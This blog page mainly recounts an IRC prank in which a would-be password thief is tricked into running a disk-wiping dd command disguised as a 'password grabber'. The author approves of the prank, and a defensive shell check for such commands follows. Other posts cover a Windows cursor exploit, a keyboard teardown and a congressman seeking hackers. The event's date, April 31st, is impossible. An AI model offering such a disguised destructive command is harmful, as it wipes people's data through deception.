
Technik News

The blog on IT, mobile communications & the Internet

Hacking

A practical guide to get yourself owned on IRC

April 15, 2007 by Harald Puhl

For those of you who are not old enough (or simply don’t know), IRC stands for Internet Relay Chat, and is one of the first real-time, multi-user chat systems that were invented, with the capability to span multiple servers across countries and continents, serving thousands of users organized in channels. Daniel Stenberg has a brief overview of IRC history if you want to know a bit more.

Many communities have dedicated IRC channels where they converse about their topics of interest, and in some cases even offer support for software or services. This is the case for #remote-exploit, registered on Freenode, which serves as a communication and support channel between developers and users of BackTrack, the best and most comprehensive Linux-based Live CD focused on security – this includes auditing, penetration testing, and so on. The IRC channel is frequented by the developers and a few hard-core users, who provide ad-hoc support to other users having difficulties with particular tools, or who may be trying to get something working but failing to do so. Regular chat around security-related topics makes the channel a very nice place to be if you are interested or work in IT security.

There seems to be a trend nowadays, maybe related to how our children are being educated at home and at school, that people simply demand to be spoon-fed particular information to accomplish a very specific task, disregarding the whole process of actually researching, learning and understanding what they are doing. This is particularly important in the security field, as lack of understanding can have very bad consequences, which brings us to today’s episode.

BIG FAT BOLD DISCLAIMERS

  • Kids, do not try this at home. Do not try to play either of the sides you see here, chances are you will lose. Particularly, do not run any of the commands you see being used!
  • Before you start posting comments about how cruel this was, I agree that things may have gone over the top, but if anyone deserved a lesson, it was this guy. Since there is no such thing as an Internet Supreme Court, we have no place to take these people so they can have their right to use the Internet suspended for two years. This guy was asking for information on how to commit several crimes, and this is something no true hacker will ever condone. He was warned many times that what he was asking was illegal and frowned upon, and he still insisted. All he lost was music and games (by his own admission, the contents of his hard drive) – it was very obvious he wasn’t using his computer for any beneficial purpose at the time, so he would just have to reinstall his games and rip his CDs again, no big deal.
  • Hacker does not equate to criminal. A hacker is after knowledge and experimentation, not causing intentional damage. Hackers are analytical and proud of their knowledge, acquired through years of learning and research. Thus, when someone asks for this knowledge to be siphoned off their brains, they get rather miffed, responding as you can see here. If you ask a hacker a sensible question, you will get a sensible answer, as we understand that, just as we were taught by others, we have a responsibility to pass on the knowledge – not by spoon-feeding though! An excellent quote found in a DefCon FAQ: ‘Ignorance is forgivable, because it’s curable; stupidity is not… The difference between ignorance and stupidity is in the desire to remain ignorant’.
  • This is not a usual event. I have only seen something like this happen twice, and I’ve been on IRC since around 1993. Don’t think that our purpose in life is to sit in IRC channels waiting for victims to prey on.

This particular event took place the evening of April 31st, when someone using the nick JEGGAN (hint: don’t use caps in IRC for either your nick or your typing, as it is considered shouting and rude) joined the #remote-exploit IRC channel, and began asking for information on how to perform various illegal acts:

[01:39] * Joins: JEGGAN (n=lechan@81-226-226-68-no58.tbcn.telia.com)
[01:40] <JEGGAN> Hi i am very new att Back Track 2 and wonder if someone want to answere my questions in private... sorry my eng i am swe
[01:47] <JEGGAN> so sad that nobody is here but i will be back tomorrow then
[01:48] <Zi0n> tomorrow we closed
[01:49] <JEGGAN> can u help me Zi0n ?
[01:49] <Zi0n> deppends on the question
[01:50] <JEGGAN> littel random about back track what i can do and not do and so on but i want to take it in privv but i goes good here if u want becus i don't want to spam down the channel whit stupied questions
[01:50] <Zi0n> if you know your question is stupid, why ask it ?
[01:51] <JEGGAN> becus i don't know if it's possibel
[01:51] <JEGGAN> for exampel can i hack irc and take auth's in quakenet whit it?
[01:51] <Zi0n> anyway, ask you question here and see if anyone can help you with it
[01:51] <JEGGAN> ok
[01:51] <JEGGAN> can i hack auth on quakenet whit back track?
[01:52] <JEGGAN> can i hack emails so i can for exampel get my friends msn account and other's account?

Things went downhill from here – Zi0n told the guy to try in #ubuntu, a channel dedicated to a much better hacker tool collection – of course we all know what Ubuntu really is, and when he joined there he was promptly directed to #ubuntu-offtopic, where he asked the same questions, and was then directed to join #binrev, a hard-core hacker channel on a different IRC server:

[01:59] <FringeJacket> JEGGAN you've got a better chance there
[01:59] <JEGGAN> okok
[01:59] <JEGGAN> let's try then
[02:00] <JEGGAN> uhm in binrev it's nobody there...
[02:00] <kitche> JEGGAN: different server irc.binrev.net is their irc server

Not realizing he was going to make a huge mistake, and having been warned that what he was asking was illegal in at least three different IRC channels, he went on to join #binrev, where the following ensued:

[02:03] * Now talking in #binrev
[02:04] <tehbizz> ok, ask the damn question alrady
[02:10] <JEGGAN> who can i get my friends msn password easy ?
[02:10] <sev> First, learn english.
[02:10] <voltagex> JEGGAN: you can
[02:10] <JEGGAN> how i mean
[02:10] <Strom> JEGGAN: we don't condone that behavior here.
[02:10] <voltagex> ask him for it
[02:11] <sev> That's not the only thing wrong with your question.
[02:11] <JEGGAN> i am new on this and i am swe so i don't have good eng i just want to talk to somebody that can help me a littel bit
[02:11] <voltagex> no.
[02:11] <voltagex> just no.
[02:12] <sev> excellent.
[02:12] <JEGGAN> ?
[02:12] <JEGGAN> so you don't want to help me
[02:12] <Adam> jeggan i know nothing of msn sorry
[02:12] <voltagex> we don't do stealing passwords here
[02:12] <JEGGAN> Adam what do you know about email ?
[02:13] <JEGGAN> voltagex what are you doing here then?
[02:13] <tehbizz> easiest way to get a password: ask for it
[02:13] <tehbizz> discussion over.
[02:13] <sev> JEGGAN: do you know about the amazing hacking powers of 'dd'?
[02:13] <JEGGAN> sev no
[02:13] <voltagex> JEGGAN: not stealing passwords
[02:14] <sev> JEGGAN: I can help you hack with dd.
[02:14] <JEGGAN> sev what is dd?
[02:14] <tehbizz> yes
[02:14] <voltagex> JEGGAN: mad hack tool
[02:14] <sev> it's a remote password grabber
[02:14] <JEGGAN> okok
[02:14] <JEGGAN> where do i get it?
[02:14] <sev> JEGGAN: do you have root access on your machine?
[02:14] <JEGGAN> yes

Now our hapless “hacker” was getting interested… someone is going to teach me how to actually hack, using something called ‘dd’. If you read Wikipedia’s entry on ‘dd’, you will see that it’s a low-level Unix tool that copies data between different media, for example from a floppy disk to a hard drive. It can use a variety of inputs, and write to a variety of outputs. Towards the bottom of the Wikipedia entry, there are some examples of the destructive power of dd, preceded by this:

[Image: warning_dd – the warning box from the Wikipedia entry on dd]

As an example, using dd if=/dev/urandom of=/dev/hda will overwrite the hard disk with random data. If this noob had bothered to simply type ‘dd’ in Google, he would have seen the Wikipedia entry as the second result, and taking two minutes to read through it, would have realized that it is not a remote password grabber. Determined to break into other people’s MSN, email and gaming accounts, he charged ahead:

[02:38] <sev> paste this: dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof
[02:38] <JEGGAN> where should i put it?
[02:39] <voltagex> in the command line
[02:39] <sev> in your command line, it's all one line, so paste it carefully
[02:39] <JEGGAN> wtf cant puch ctr+c to copy :s
[02:39] <tehbizz> shift+insert
[02:39] <JEGGAN> now it worked

And the inevitable happened, after a few hours of waiting for something to happen while dd was running:

[18:07] <Citrus> try to reboot anyway
[18:07] <JEGGAN> ok
[18:08] <Citrus> you don't loose anything to see if LILO is there already
[18:08] <JEGGAN> should i boot in windows or BT?
[18:08] <Citrus> no, just boot normal without the CD
[18:08] <JEGGAN> ok
[18:08] <Citrus> you should see a menu
[18:08] <JEGGAN> brb
[18:08] * Quits: JEGGAN (~root@81-226-226-68-no58.tbcn.telia.com) (Quit: Leaving)
[18:14] * Joins: JEGGAN (~JEGGAN@81-226-226-68-no58.tbcn.telia.com)
[18:15] <JEGGAN> Citrus,
[18:15] <JEGGAN> no menu and windows dosen't boot
[18:15] <Citrus> what do you mean doesn't boot?
[18:15] <JEGGAN> that i can't go into windows..
[18:16] <Citrus> JEGGAN: what message do you get?
[18:16] <JEGGAN> insert system disk

You can read the whole exchange here, edited to remove irrelevant background chatter. Lessons to be learned from this:

  • Don’t be an idiot – if you are told to go search and read, it is very likely that there are numerous sources for answers to your question. If you are told what you want to do is illegal, drop it.
  • Don’t believe everything you are told online (this applies to other means than IRC too!) – would you take advice from a total stranger on the street on how to do brain surgery on yourself? There is no shame in taking your time to double-check advice you are given.
  • Learn the basics and work your way up, not the other way around – if you ask to be taught a very high-level and complex topic, without having made the effort to even learn the basics, you will be frowned upon.
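The second lesson can be made mechanical. As an added example that is not part of the original post, this POSIX sh script classifies a pasted command line the way a cautious reader should have classified the one above: it shows that everything after an unquoted ‘#’ is a shell comment (so the “download URL” did nothing at all) and that dd’s of= pointed at a raw disk device. The function names (strip_comment, classify_dd) and the list of device-node prefixes are my own choices.

```shell
#!/bin/sh
# Added example for this post (not the author's code): a small checker for a
# command line somebody pastes to you, run *before* you paste it into a shell.
# It strips the trailing shell comment, locates the dd invocation and reports
# whether dd's of= target is a raw disk or partition device node.

# Drop a trailing comment. The shell ignores everything after an unquoted '#',
# so a "download URL" placed there is pure decoration and is never fetched.
# (Simplification: a '#' inside quotes is not special-cased.)
strip_comment() {
    printf '%s\n' "$1" | sed 's/[[:space:]]#.*$//; s/^#.*$//'
}

# Print one verdict word for a command line:
#   destructive - dd writes to a whole-disk or partition device node
#   dd          - dd with some other output (a file, /dev/null, stdout)
#   other       - the first command is not dd at all
classify_dd() {
    cmd=$(strip_comment "$1")
    set -f              # no pathname expansion while splitting into words
    set -- $cmd
    set +f
    [ "${1:-}" = sudo ] && shift    # a leading sudo changes nothing below
    case "${1:-}" in
        dd|*/dd) ;;
        *) echo other; return 0 ;;
    esac
    of=""
    for word in "$@"; do
        case "$word" in
            of=*) of=${word#of=} ;;
        esac
    done
    # Device-node prefixes used by IDE, SCSI/SATA/USB, NVMe, virtio, Xen,
    # SD/MMC and BSD/macOS disks. Partitions (hda1, sdb2) match as well.
    case "$of" in
        /dev/hd*|/dev/sd*|/dev/nvme*|/dev/vd*|/dev/xvd*|/dev/mmcblk*|/dev/disk*)
            echo destructive ;;
        *)
            echo dd ;;
    esac
}

# The line JEGGAN was handed, used here as constructed sample input.
# Prints "destructive" without executing anything.
classify_dd 'dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof'
```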

How to get your Windows PC owned by an animated cursor

April 3, 2007 by Harald Puhl

Some of you have already heard of the very nasty vulnerability recently discovered in Windows, which allows code injection when the hapless victim simply views an animated cursor on an HTML page or in an email message. Microsoft has announced that due to the seriousness of this issue, it will publish an out-of-cycle patch as soon as it is ready, i.e. they will not wait for Patch Tuesday™. [Update: as I was writing this, I noticed this post which states that patch MS07-017 has been released].

What do you do when you have in your hands the best security distribution in the world? Use it! Here is the result of Mati Aharoni’s (aka Muts) impersonation of The Mexican – click the image to view the full video.


[Image: ani_pwn – links to the full video]

Kids, do not try this at home, and if you are using Windows, well…my sincere condolences. While you are at it, check out the home site for BackTrack.

Autopsy of a Logitech MX5000, and the reason why it sucks

March 14, 2007 by Harald Puhl

I wrote before about the Logitech MX5000 Bluetooth keyboard & mouse combo, and there are plenty of posts around the web that confirm that the product sucks – badly.

To recap a bit, the problems are random reboots of the keyboard, disconnections of keyboard and mouse, erratic mouse behavior (including spontaneous motion of the cursor), and repeated keystrokes after the keyboard has not been used for a few minutes (resulting in things like “aaaaaaaafter the news…”). In all, a very frustrating and annoying experience, for a rather expensive combo. Logitech seem to acknowledge the problem, but I have not yet seen any form of update that could fix this, and my theory is that the problem cannot be fixed with a simple software update.

Declaring the keyboard and mouse defunct, I performed an autopsy, which revealed a few interesting facts (details after the jump):

  • The Bluetooth dongle has a very strange RF design – it uses a normal groundplane meander PCB antenna, but then it has a copper-wire loop antenna on top.
  • Dongle and keyboard use Bluetooth chipsets from different manufacturers (CSR and Broadcom), in theory interoperable, in reality… well.
  • The touchpad uses a very crappy sensor design, which explains the lack of responsiveness and uselessness of the scrolling controls.

Let’s start with the dongle. Below are a couple of photos of the opened device, the first with the loop antenna in place, the second with it removed, showing the meander. If someone with better RF knowledge than me can explain why this makes sense, I would be grateful. The design of the loop itself is wrong for 2.4GHz, having a wire length about 10 times larger than what would be required given its size.

[Images: dsc_1279 (loop antenna in place), dsc_1280 (loop removed, meander visible)]

The dongle uses a Broadcom BCM2045 chipset, with a 4 Mbit flash memory onto which the firmware is loaded. The meander is a PCB track designed for 50 ohm impedance, coupled to the chipset via a normal inductor-resistor-inductor matching network. Noticeable is the lack of baluns or filters; I’ll have to check the datasheet (if it’s publicly available) on this aspect.

Let’s take a look at the keyboard, starting with the touch controls. These are built into the keyboard as a separate module, linked to the main control board with a flat ribbon cable, and consist of three main pieces – the PCB and touch sensors, external case with printed cover, and a plastic support with built-in LED light pipes. The controls are made with a layer of gold-plated copper, printed on the underside of the PCB, and on the top side lives the control chip, made by Synaptics (who also makes touchpad systems and other stuff).
[Image: dsc_1289 – the touch control module]

These controls work on the principle of capacitance change. When you place your finger near the sensor, a capacitive effect takes place (using the air and any other material in between as dielectric), which can be measured. It is very small, but enough to give an indication that a finger is present. There are a few rules that one must follow when designing such touchpads, as any interference with the capacitive effect can have negative results on the ‘feel’ of the controls. Namely, ground planes have to be carefully controlled, and usually placed away from the sensor area; the sensors have to have a minimum size in order to be effective; and any trace routes from the sensor pad to the control IC have to be kept tight, avoiding cross-overs and other disturbances.

I am not familiar with the Synaptics chip, but I have worked with Quantum Research QProx devices, and I cannot see how the physics of capacitance could be avoided in either case. The MX5000 design violates all these rules. The sensor areas are irregular, with a gaping hole in the middle to allow LED light to pass through; there are ground planes all over the PCB; the tracks meet and part at various spacings and pass right next to ground planes. The biggest joke seems to be the ‘sliding’ sensors for the volume and zoom. These are depicted on the face of the keyboard as smooth analog paths, as if one could go from minimum zoom or volume to maximum by sliding the finger to each end of the vertical scale. The truth is that to change the volume in any significant way, one has to repeatedly slide the finger along the whole path of the scale several times, and in some cases the detection doesn’t work at all. You end up looking demented, rubbing away at the side of your keyboard repeatedly! As is shown in the photo, the sliding scale has only 7 distinct sensors, thus giving you a maximum of six detectable steps in either direction (each step is signaled by the triggering of one sensor, then the one adjacent, determining the direction of finger travel). It would be a bad idea to place the whole volume or zoom range on a scale of six steps, and so they settled for the crazy-monkey-rubbing-keyboard action instead.

The next two pictures show the PCB inside the plastic assembly that houses the faceplate. Notice how the cutouts allow for light from the LEDs to be piped towards the labels and icons.

[Image: dsc_1292 – PCB inside the faceplate assembly]

[Image: dsc_1294 – LED light-pipe cutouts]

And finally, the last part of the broken equation – the Bluetooth module on the keyboard. It uses a CSR BlueCore3 ROM, which is cheap but cannot have its firmware modified after the die has been printed, meaning whatever bugs you had in the device will be there forever. Again, the module uses a meander antenna. Now, I am not too familiar with the Broadcom chipset, but I have worked with CSR chipsets quite a bit, and know they provide a balanced antenna output, which means that to use an antenna such as a meander or a chip antenna, you have to go through a balun. I don’t see a balun on the MX5000’s module, and so it appears they have attempted to balance the antenna with another set of meanders, which can be seen between the chip and the large main meander in the picture below:

[Image: dsc_1296 – keyboard Bluetooth module with meander antennas]

Again, this design doesn’t seem to be the best in terms of RF performance, especially when you have a large inductor nearby (L1).

Conclusion? Don’t buy one of these, if you want to go wireless, get one of the non-Bluetooth (some also work at 2.4GHz) keyboard/mouse combinations, and I would still say get a Logitech, as they make some very good ones, such as the MX3000. I’ve always used Logitech, but the MX5000 has been a real lemon.

Trying to hire hackers to commit a crime is a bad idea

December 29, 2006 by Harald Puhl

This is rather funny, not least because it involves a US congressman, Denny Rehberg of Montana, and his communications director. Apparently, Rehberg was not happy with the grades he got while at Texas Christian University, and thus started to shop around for a hacker who would break into the institution’s systems to upgrade his grades. He contacted none other than attrition.org, where the entire email exchange has been posted. It is a rather fun read if you are a true hacker – not to be confused with criminals, who are into doing this sort of thing – and a warning to clueless politicians.
